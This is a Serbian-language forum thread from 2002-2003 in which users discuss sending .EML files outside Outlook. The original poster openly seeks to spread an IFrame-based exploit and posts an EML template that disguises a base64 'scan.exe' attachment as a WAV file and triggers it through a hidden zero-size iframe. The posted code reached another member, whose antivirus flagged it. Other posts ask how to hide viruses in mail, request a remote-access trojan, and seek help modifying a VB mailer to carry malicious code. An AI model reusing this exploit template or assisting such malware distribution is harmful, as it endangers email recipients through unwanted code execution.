Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

Kako poslati *.EML bez Outlooka

[es] :: Zaštita :: Kako poslati *.EML bez Outlooka

Strane: 1 2

[ Pregleda: 9554 | Odgovora: 27 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

Krajisnik
Beograd

Član broj: 2306
Poruke: 294
*.beotel.net



Profil

icon Kako poslati *.EML bez Outlooka11.09.2002. u 23:31 - pre 263 meseci
Jel se moze nekako poslati EML fajl bez upotrebe outlooka, tako da ne bi sam sebe ostetio skriptom u tom email-u kad ga otvorim radi slanja. Nisam bas najjasnije opisao problem ali sta je tu je. Znaci, samo mi treba program koji ce slati EML fajlove a da nije podlozan raznim bugovima poput I_Frame i ostalih....
Sale_®
 
Odgovor na temu

Jbyn4e

Član broj: 422
Poruke: 6049
*.verat.net



+257 Profil

icon Re: Kako poslati *.EML bez Outlooka12.09.2002. u 16:50 - pre 263 meseci
Pa pazi, EML fajl je obican txt fajl ako se dobro secam - znaci otvoris u editoru, copy pa paste u bilo kojem drugom normalnom mail programu - npr. the bat! posaljes... Ili druga varijanta su ti mail programcici koji rade pod dos prozorom...

Jel ti to hoces da saljes ljudima viruse, a?

Kad sve ostalo zakaže, pročitaj uputstvo...
 
Odgovor na temu

Krajisnik
Beograd

Član broj: 2306
Poruke: 294
*.beotel.net



Profil

icon Re: Kako poslati *.EML bez Outlooka12.09.2002. u 18:03 - pre 263 meseci
Prvi nacin ne radi zbog X razloga da ti sad ne nabrajam, a drugi bi eventualno mogao raditi ako postoji DOS program koji je kompatibilan sa EML fajlovima a to je ja mislim tesko posto su EML skracenica za "Outlook Express Email Message"....
A sto se tice virusa, nemam tu nameru..... Trojanci su vec druga stvar ali opet u plemenite svrhe, ako je razlog uoppste bitan.....
Sale_®
 
Odgovor na temu

Jbyn4e

Član broj: 422
Poruke: 6049
*.verat.net



+257 Profil

icon Re: Kako poslati *.EML bez Outlooka12.09.2002. u 18:22 - pre 263 meseci
O boze.... eml je microsoft uveo kao skracenicu, da si pogledao kako izgleda .eml fajl video bi da je to jedan obican tekst fajl sa podacima ko kome gde i tako dalje.
Evo ti primer - poruka koja je napisana u outlook-u i umesto da bude poslata - samo je snimljena (dakle, OVAKO izgleda eml fajl):
Citat:

From: "cenzura" <[email protected]>
To: "[email protected]"
Subject: rt5ewrter
Date: Thu, 12 Sep 2002 18:06:51 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-2"
Content-Transfer-Encoding: 8bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400

tewrtewr

Dakle, kao sto vidis - obican txt fajl sa nekim podacima....
Uostalom, uvek moze da se posalje mail "rucno" , kacenjem na server na port 25 i koriscenjem komandi mail servera...


Kad sve ostalo zakaže, pročitaj uputstvo...
 
Odgovor na temu

Djomloun
Mladjan Jovanovic
Bgd

Član broj: 3604
Poruke: 984
*.92.EUnet.yu

ICQ: 158628304
Sajt: blogoye.org/djomlouns


Profil

icon Re: Kako poslati *.EML bez Outlooka12.09.2002. u 18:26 - pre 263 meseci
Jeste da je malo off topic ali kako ja mogu da ubacim virus direktno u source mejl tako da kada neko otvori mejl on cita txt a u pozadini se aktivira virus ili pak da ga zakacim kao attach i kada neko primi mejl attach (virus) se odmah aktivira.
Hvala.

p.s. jel zna neko naziv neko virus koji bi mi omogucio kada ga osoba primi da mogu da se nakacim na njen komp kada je ista on line.
Josx dok sam bio klinac baba me je uchila da ne jedem zxut sneg, citamo se na mojoj svasxtari lnk: http://blogoye.org/djomlouns/

ZM0501 :)


//napustio [es]...
 
Odgovor na temu

Krajisnik
Beograd

Član broj: 2306
Poruke: 294
*.beotel.net



Profil

icon Re: Kako poslati *.EML bez Outlooka12.09.2002. u 19:54 - pre 263 meseci
Pa normalno da je text fajl kad ga otvoris u notepadu..... Ali otvori taj isti text fajl u Outlooku ili pejstuj ono sto si ti napisao u svom postu u neki drugi email client i dobices obican text, dok u outlooku neces videti da je ista napisano jer je to scripta koju sam outlook prepoznaje i ko zna jos koji client... A da i ne pocinjem o skriptama....koje su isto tako obican text kad se otvori u notepadu ali zato se u otvorenom EMLu nista ne vidi, kao da ni nema skripte. Sve ovo verovatno vec znas ali ne znam sta ti znaci ono da je EML obican text, pa i EXE fajl kad otvoris u Wordpadu ce biti obican text????
Sto se tice kacenja na server, ne verujem, tj. ne znam kako ces ti poslati skriptovan email i jos sa attachovanim fajlom preko telneta????
Sale_®
 
Odgovor na temu

StratOS
Slovenija

Član broj: 2234
Poruke: 989
*.dsl.siol.net



+1 Profil

icon Re: Kako poslati *.EML bez Outlooka12.09.2002. u 23:05 - pre 263 meseci
Heh jedan ************** od ?????????????? ...

pa moguce je poslati mail preko telneta i isto tako ga i citati.
To su ti obicni GET/POST komande preko SMTP.

A sto se tice attachementa i ostalih auto run scripti to je odvisno od klienta ( M$ outlook ... ) i servera (Microsoft-IIS/5.0 mail server ... ).

Neki serveri mozda brisu koje poslane headere u mailu i avtomatsko ociscuju navlaku, no ako nismo poslali obvezne potrebne headere vaš mail če biti zabačen.
Ako napraviš vlastiti SMTP program na svome serveru mozes se stvarno igrati sa svacim i izkoristiti priliku te programsko promenuti HEADERE ( vrijeme, UA klienta, IP, tko salje ( mail adress, server - to je bas dobro !!! ) i ostale stvarcice .... )


primjer check maila sa hotmaila :
scan sa HTTP kumunikacije http://services.msn.com/svcs/hotmail/httpmail.asp
server www.hotmail.com

request :

PROPFIND /cgi-bin/hmdata/[email protected]/folders/msnpromo/ HTTP/1.0
Depth: 1,noroot
Content-Type: text/xml
Brief: t
X-Timestamp: ACTIVE=1031213456
Accept-CharSet: windows-1250
User-Agent: Outlook-Express/6.0 (MSIE 6.0; Windows NT 5.1; TmstmpExt)
Host: law15.oe.hotmail.com
Content-Length: 286
Pragma: no-cache
Cookie: MSPAuth=bla bla bla
MSPProf=bla bla bla;
HMSC0899=222iskanimail%40hotmail + bla bla bla;
HMMS2954=blabla;
OE_UserUporabnik_hotmail.com+bla bla bla
Connection: keep-alive
Browser reload detected...
Posting 286 bytes...


odgovor :
HTTP/1.1 207 Multi-Status
Server: Microsoft-IIS/5.0
Date: Thu, 05 Sep 2002 08:15:43 GMT
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Connection: close
Set-Cookie:
HMSC0899=222iskanimail%40hotmail + bla bla bla;
domain=.hotmail.com;
path=/cgi-bin/hmdata/[email protected]
Content-Length: 663
Expires: Mon, 01 Jan 1999 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/xml
X-Dav-Error: 200 No error
HMServer:
H: DAV33.law15.internal.hotmail.com
V: WIN2K 09.05.50.0028 i
D: Aug 12 2002 12:08:55


Evo i jednog dobrog trika kad smo več kod "novih" stvari :


http://www.securiteam.com/securitynews/5YP0A0K8CM.html

[Ovu poruku je menjao StratOS dana 16.09.2002 u 07:00 PM GMT]
Pozdrav StratOS
"Multitasking - ability to f##k up several things at once."
"It works better if you plug it in."
"As a rule, software systems do not work well until they have been used, and have failed repeatedly, in real applications."
"The one who is digging the hole for the other to fall in is allready in it."
 
Odgovor na temu

McKracken
Vladimir Jovanovic
HuxleyDev

Član broj: 465
Poruke: 2941
*.ptt.yu

ICQ: 203079925


+7 Profil

icon Re: Kako poslati *.EML bez Outlooka13.09.2002. u 01:30 - pre 263 meseci
Sta ti tacno znaci "skriptovan email"? Email se moze poslati iz obicne shell skripte ili bilo kog programa.

Pogledaj pop3/smtp specifikaciju i videces da SVI programi koji salju mail preko smtp-a rade na isti nacin. Da li ce neki klijent interpretirati skriptu, zavisi od njegove implementacije. Takodje, pogledaj sta znaci MIME...


Inace .exe nije tekstualni fajl.

Bolje uzmi neku specifikaciju internet protokola i procitaj je, pre nego sto napadnes coveka koji pokusava da ti pomogne da uradis nesto sto ocigledno ne znas.
 
Odgovor na temu

StratOS
Slovenija

Član broj: 2234
Poruke: 989
*.dsl.siol.net



+1 Profil

icon Re: Kako poslati *.EML bez Outlooka13.09.2002. u 07:39 - pre 263 meseci
Ni u ovome postu nisam se koristio riječnika, znam imam problemcic kod pisanja i zato se iskreno ispričavam.


Citat:
Krajisnik:
da je EML obican text, pa i EXE fajl kad otvoris u Wordpadu ce biti obican text????


.. da što se neenkriptiranog db-a tiče ( parametri, variable, text resource ... )

Citat:
Krajisnik:
Sto se tice kacenja na server, ne verujem, tj. ne znam kako ces ti poslati skriptovan email i jos sa attachovanim fajlom preko telneta


.. da i to je moguče - McKracken ti je to ljepo odgovorio ... MIME encodings ( slike, attachement itd ...)

Citat:
Krajisnik:
skriptovan email


a što ti je to mail sa js ili vbs ili activex ??? Nemam pojma što bi to trebalo da znači.
Večina servera takve skripte izbacuje ( zna se zašto ), ako bar mislim na ono što ti misliš.

Citat:
Krajisnik:
da ako napravis sopstveni SMTP program itd. da mozes promeniti one navedene stvari, to mozes i sa svog komp


da, poslati samo mail ...
programi klienti na tvom racunaru ti samo koriste da brže i pravilno napises mail, koji ce imati pravilno strukturu i headere, kojeg ce server (SMTPSVC) onda obraditi i taj če onda dodati svoje headere mailu kome ga ti saljes ...
Ako imas vlastiti SMTPSVC server program mozes da se jako igras sa tim headerima i napravis svoj vlastiti protokol.

primjer :


Received: from es.verat.net ([217.26.67.165]) by mc2-f18.law16.hotmail.com with Microsoft SMTPSVC(5.0.2195.5600);
Thu, 12 Sep 2002 15:05:47 -0700
Received: (from nobody@localhost)
by es.verat.net (8.12.2/8.10.2) id g8CN987G002044;
Thu, 12 Sep 2002 23:09:08 GMT
Date: Thu, 12 Sep 2002 23:09:08 GMT
Message-Id: <[email protected]>
To: StratOS <[email protected]>
Subject: Odgovor na ES-u: "Re: Kako poslati *.EML bez Outlooka", Autor: "Krajisnik", Datum: 13.09.2002 (www.elitesecurity.org)
From: "[ES] Forumi" <[email protected]>
Return-Path: [email protected]
X-OriginalArrivalTime: 12 Sep 2002 22:05:49.0198 (UTC) FILETIME=[8D5552E0:01C25AA8]



Citat:
Krajisnik:
Nisam bas najjasnije opisao problem ali sta je tu je


da, imaš pravo, kad problem jasnije specificiraš sve če biti ok


Citat:
Krajisnik:
Jel se moze nekako poslati EML


ekstenzija *.EML je registry podatak koji program ti imaš instaliran za obradu i izradu vlastitih mailova, to je u bistvu ASCII text file.

Citat:
McKracken:

Bolje uzmi neku specifikaciju internet protokola i procitaj je, pre nego sto napadnes coveka koji pokusava da ti pomogne da uradis nesto sto ocigledno ne znas.


[Ovu poruku je menjao Gojko Vujovic dana 23.09.2002. u 01:59 GMT]
Pozdrav StratOS
"Multitasking - ability to f##k up several things at once."
"It works better if you plug it in."
"As a rule, software systems do not work well until they have been used, and have failed repeatedly, in real applications."
"The one who is digging the hole for the other to fall in is allready in it."
 
Odgovor na temu

Djomloun
Mladjan Jovanovic
Bgd

Član broj: 3604
Poruke: 984
*.53.EUnet.yu

ICQ: 158628304
Sajt: blogoye.org/djomlouns


Profil

icon Re: Kako poslati *.EML bez Outlooka13.09.2002. u 11:23 - pre 263 meseci
StartOS bio sam na tvom linku i txt je super medjutim on resava onaj finalni deo problema, tj. kada zbudizte vir kako da ga posaljete a da ne izvali smtp, i fora je stvarno super Podelite mejl na vise delova i smtp nece izvaliti da je vir i to iz samog OE
Ali kako da resim main problem, da zbudzim vir u mejl tako da se on ne vidi, to jeste kada neko primi mejl da on cita txt a da se u pozadini aktivira vir? Ili pak da ga zakacim za attach i da se attach odmah izvrsava po prijemu mejla ???
Josx dok sam bio klinac baba me je uchila da ne jedem zxut sneg, citamo se na mojoj svasxtari lnk: http://blogoye.org/djomlouns/

ZM0501 :)


//napustio [es]...
 
Odgovor na temu

Krajisnik
Beograd

Član broj: 2306
Poruke: 294
*.beotel.net



Profil

icon Re: Kako poslati *.EML bez Outlooka13.09.2002. u 12:32 - pre 263 meseci
Sto se tice napadanja, nije da moja mora biti zadnja, ali ne podnosim kad neko pocne odgovor sa "jedan pametniji od drugog"...Zato sam morao malcice reagovati ali ajd nastavimo dalje normalno.. A i vidim da niko bas nije razumeo sta sam hteo, posto McGregor kaze da pogledam sta je to i to, "kao npr. MIME, osn. internet protokol itd. koje ocigledno ne znam". Dakle znam sta je sta, nego svako ovde prica svoju pricu. Sto se tice onoga sopstvenog SMTPa, ne treba ti za ono sto ti kazes, ali to cu dokazati drugi put.
Kad kazem skripte, mislim na sve i Javu i ActiveX, posto je ponekad potrebno oboje...A server ne bi trebao da izbaci skripte koje jos nisu povezane ni sa jednim wormom ili sl. Bar jedan zagrebacki server nije izvalio skript, ali posalo sam EML kao attachement, tako da ne znam da li je uopste proveravao....
Jedan moj script se zasniva na I-Frame-u pa posle je povezan sa jos 10 scriptova, ali cim tako snimljen EML otvorim u Outlooku meni se preko I_frame-a pocne pokretati moj exploit i sam sam sebe zajebo. Mozda sam sada detaljnije opisao problem pa ako neko zna kako da ga i sa kojim programom zaobidjem, neka javi posto jos niko nije dao striktan odgovor.....
Sale_®
 
Odgovor na temu

Jbyn4e

Član broj: 422
Poruke: 6049
*.verat.net



+257 Profil

icon Re: Kako poslati *.EML bez Outlooka13.09.2002. u 17:01 - pre 263 meseci
Koliko sam ja shvatio, ti hoces da posaljes html mail ne koristeci outlook express. EML ekstenziju ti od maila pravi sam outlook express, drugi mail klijenti ne moraju da imaju tu ekstenziju kad snimaju poruke. Zato sam ti rekao da je eml u stvari samo cist tekst, samo snimljen pod ekstenzijom eml. Kako izgleda html mail? Pa i to je tekst fajl, sa komandama unutar sebe, koje neki mail klijent (znaci, mail program) moze interpretirati ako zna kako. Npr. tesko da bi citao html mail sa pine-om (koji radi pod unixom u tekstualnom modu - mada mozda postoje nove verzije koje to rade)- vec bi video cist tekst sa html komandama - izmedju ostalih i i_frame koju ti tako pominjes cesto.
Drugo. Kako izgleda slati mail pomocu telneta mozes pogleadti na adresi/ama:
http://www.daemonnews.org/199905/telnet.html
http://www.codestore.net/A5569.../unid/EPSD-587VVX?OpenDocument
O RFC-u SMTP-a mozes pogledati npr.
http://www.faqs.org/rfcs/rfc821.html
i verujem da ce ti biti jasnije. HTML mail se salje tako sto posaljes komandu zaglavlja SMTP serveru koji to prosledjuje dalje, a tvoj mail program zna da treba da to prikaze u html obliku. Znaci, ti saljes tekst sa komandama, a PROGRAM (npr. Outlook Express) to interpretira kao html mail. Naravno, attachemnt je u vidu nekih ludih znakova (MIME konverzija valjda) - sto OPET TVOJ mail program zna na osnovu headera o cemu se radi, i vrsi konverziju nazad u fajl.
Postoji verovatno mnogo programa koji salju na smtp direktno, ili zaobilaze tvog provajdera. Evo ti nekoliko adresa pa pogledaj:
http://www.nonags.com/nonags/emc.html
http://www.emailman.com/win/tools.html
http://www.nabyoo.com/rapidmailer.html
http://www.slaughterhouse.com/email.html
http://www.nwoods.com/ACT/MailMerge.htm
http://www.sohoany.com/
Naravno, neki se placaju, a neki su besplatni... pa ti vidi, ima ih jos dosta da ne nabrajam.
E sad, akoocekujes da cu ti ja ili biloko reci kako da posaljes mail koji ce kod nekog da se izvrsi bez njegove volje - u tome si se presao. Moras malo sam da naucis i da se potrudis. Ali moj savet ti je da se okanes coravog posla (npr. ja znam kako da to izvedem, ali ne zelim da sticem reputaciju na taj nacin - mozda kad bih bio star tek nekih 10-13 godina), nego gledaj da to iskoristis da nesto naucis, i eventualno napravis neko svoje programce koje ce KORISTITI svetu, a ne da bude namenjeno DESTRUKCIJI!


Dosta o tome, vec sam i previse vremena izgubio na ovakve stvari....

Kad sve ostalo zakaže, pročitaj uputstvo...
 
Odgovor na temu

Krajisnik
Beograd

Član broj: 2306
Poruke: 294
*.beotel.net



Profil

icon Re: Kako poslati *.EML bez Outlooka14.09.2002. u 01:04 - pre 263 meseci
Pregledao linkove i isprobao sve programcice ali nijedan ne moze da posalje ni pocetni script dole a ove ostale onda nisam ni probavao. Evo obicnog EMLa pa zna li neko bar to poslati ali da se nijedan deo EMLa ne izmeni, jer mislim da ce onda izgubiti funkcionalnost??? Naravno mislim na onaj deo od "Status: U" pa na dole...

From: "Sale" <[email protected]>
To: [email protected]
Subject: bla
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
Message-Id: <[email protected]>
Date: Tue, 27 Nov 2001 17:18:55 +0100
X-RCPT-TO: <[email protected]>
X-UIDL: 928
Status: U

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="scan.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVoOAQEAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAA

etc.

AAEAAIABAADAAwAA4AcAAPAfAAD4/wAA/P8AAAAAAAAAAAAA

--====_ABC1234567890DEF_====

Sale_®
 
Odgovor na temu

Djomloun
Mladjan Jovanovic
Bgd

Član broj: 3604
Poruke: 984
*.242.EUnet.yu

ICQ: 158628304
Sajt: blogoye.org/djomlouns


Profil

icon Re: Kako poslati *.EML bez Outlooka14.09.2002. u 17:08 - pre 263 meseci
Mislim da je ovo stvarno nemesno sto si uradio Kraisnik! Danas sam dobio virus tacnije pisalo je Code, suspected for virs: Exploit.IFrame.FileDownload a virus je poslan od strane Saleta adresa [email protected]. I danas sam mozgao ceo dan odakle tebi moj mejl, da bih kasnije ukapirao da sam u doticnoj temi postavio da mi se svki Re salje na mejl a ti si postovao taj kod tako da je on stigo do mene.
Mislim da je ovo jedan vrlo ruzan vid zloupotrebe ES-a!
Josx dok sam bio klinac baba me je uchila da ne jedem zxut sneg, citamo se na mojoj svasxtari lnk: http://blogoye.org/djomlouns/

ZM0501 :)


//napustio [es]...
 
Odgovor na temu

Krajisnik
Beograd

Član broj: 2306
Poruke: 294
*.beotel.net



Profil

icon Re: Kako poslati *.EML bez Outlooka14.09.2002. u 20:03 - pre 263 meseci
Jebiga, shit happens. Nisam znao da moze tako da se izvsi taj kod, ali u svakom slucaju cak i da sam postavio ceo enkodiran fajl, pokrenuo bi ti se scandisk, tako da ne mislis da sam to postavio sa nekom opakom ili bilo kakvom drugom namerom...
Sale_®
 
Odgovor na temu

Djomloun
Mladjan Jovanovic
Bgd

Član broj: 3604
Poruke: 984
*.191.EUnet.yu

ICQ: 158628304
Sajt: blogoye.org/djomlouns


Profil

icon Re: Kako poslati *.EML bez Outlooka09.11.2002. u 10:34 - pre 261 meseci
Jesta da je tema malo matora ali cisto Kraisnik da te razuverim oko nekih stvari da ne gubis dzaba vreme u nesto sto ne radi jer ti ovaj tvoj autoexecution ne radi.
A zasto?
Pa lepo kada kliknes U OE na taj mejl koji si poslao pre i u kome si namestio satro autoexecution, krene da se otvara attach ALI te OE pita da li zelis da otvaras isti, tacnije pojavi ti se isti onaj dijalog kao kada ti neko posalje attach i ti krenes da ga otvoris, valjda me razumes sta hocu da ti kazem. Tako da ti moras da klinkes na Open It, i samim time to nije autoexecutio, a i kada kliknes nece se izvrsiti attach jer si stavio
Content-Type: audio/x-wav;
i samim time se otvara program koji cita *.wav npr WinAmp i program se ne pokrece, sto bi se eventualo moglo resiti mozda neki joinerom wav+exe u wav...
Eto hteo sam samo toliko da kazem da ne fercera.
p0z
Josx dok sam bio klinac baba me je uchila da ne jedem zxut sneg, citamo se na mojoj svasxtari lnk: http://blogoye.org/djomlouns/

ZM0501 :)


//napustio [es]...
 
Odgovor na temu

Djomloun
Mladjan Jovanovic
Bgd

Član broj: 3604
Poruke: 984
*.17.EUnet.yu

ICQ: 158628304
Sajt: blogoye.org/djomlouns


Profil

icon Re: Kako poslati *.EML bez Outlooka19.11.2002. u 20:02 - pre 260 meseci
Man OVAj code sto si ga gore postovao (sto si trazio way kako da ga posaljes bez OE) ne fercera sto posto, pa probao sam ***ote, ako mi ne verujes daj mi mejl pa da ti posaljem na isti mejl sa kodom sto si ga ti gore zamislio.
Btw vecina (ako ne i svi?) provajderi brisu mejl sa virusom sa smtp servera tako da je to jos jedna stvar down.
Josx dok sam bio klinac baba me je uchila da ne jedem zxut sneg, citamo se na mojoj svasxtari lnk: http://blogoye.org/djomlouns/

ZM0501 :)


//napustio [es]...
 
Odgovor na temu

Krajisnik
Beograd

Član broj: 2306
Poruke: 294
*.ptt.yu



Profil

icon Re: Kako poslati *.EML bez Outlooka24.12.2002. u 20:20 - pre 259 meseci
Pa ja ne znam kako si uspeo sam sebi da posaljes kod, jer ako ti se izlistao kao text kad si primio email, onda ga nisi dobro ni "ugradio" u email.... Ali to ustvari nije ni bitno... Taj kod je prastari, a plus toga nije ni napisan kako treba, tj. jeste ali treba jos malo da se doda da bi mogao da proradi... Koju verziju Outlooka imas? Daj mi email pa cu ti poslati nesto bezopasno i uvericu te... Ali moras mi samo reci koju verziju Outlooka imas...
Imam ja program koji je neki prijatelj napravio i koristi bas taj kod... E sad taj prijatelj vise nije dostupan a imam source code tog programa.. I ja bih sad da ubacim neki nov kod koji sam napravio ali ne znam kako da izmenim taj program(koji je mislim radjen u VB-u), pa ako neko ima pola sata da to izmeni za mene bio bih mu zahvalan....Ako neko zna dobro da radi sa VB-om, nek mi javi pa cu da kazem opsirnije o tome kako to treba da izgleda....
Sale_®
 
Odgovor na temu

Krajisnik
Beograd

Član broj: 2306
Poruke: 294
*.beotel.net



Profil

icon Re: Kako poslati *.EML bez Outlooka12.02.2003. u 17:15 - pre 258 meseci
Zar nikoo ne zna bar malo VB da izmeni taj fajl... Ne bi trebalo da traje duze od 10min.
Sale_®
 
Odgovor na temu

StratOS
Slovenija

Član broj: 2234
Poruke: 989
*.dsl.siol.net



+1 Profil

icon Re: Kako poslati *.EML bez Outlooka20.02.2003. u 14:07 - pre 257 meseci
a sto bi hteo da izmjenim ?
posalji na mail
Pozdrav StratOS
"Multitasking - ability to f##k up several things at once."
"It works better if you plug it in."
"As a rule, software systems do not work well until they have been used, and have failed repeatedly, in real applications."
"The one who is digging the hole for the other to fall in is allready in it."
 
Odgovor na temu

[es] :: Zaštita :: Kako poslati *.EML bez Outlooka

Strane: 1 2

[ Pregleda: 9554 | Odgovora: 27 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.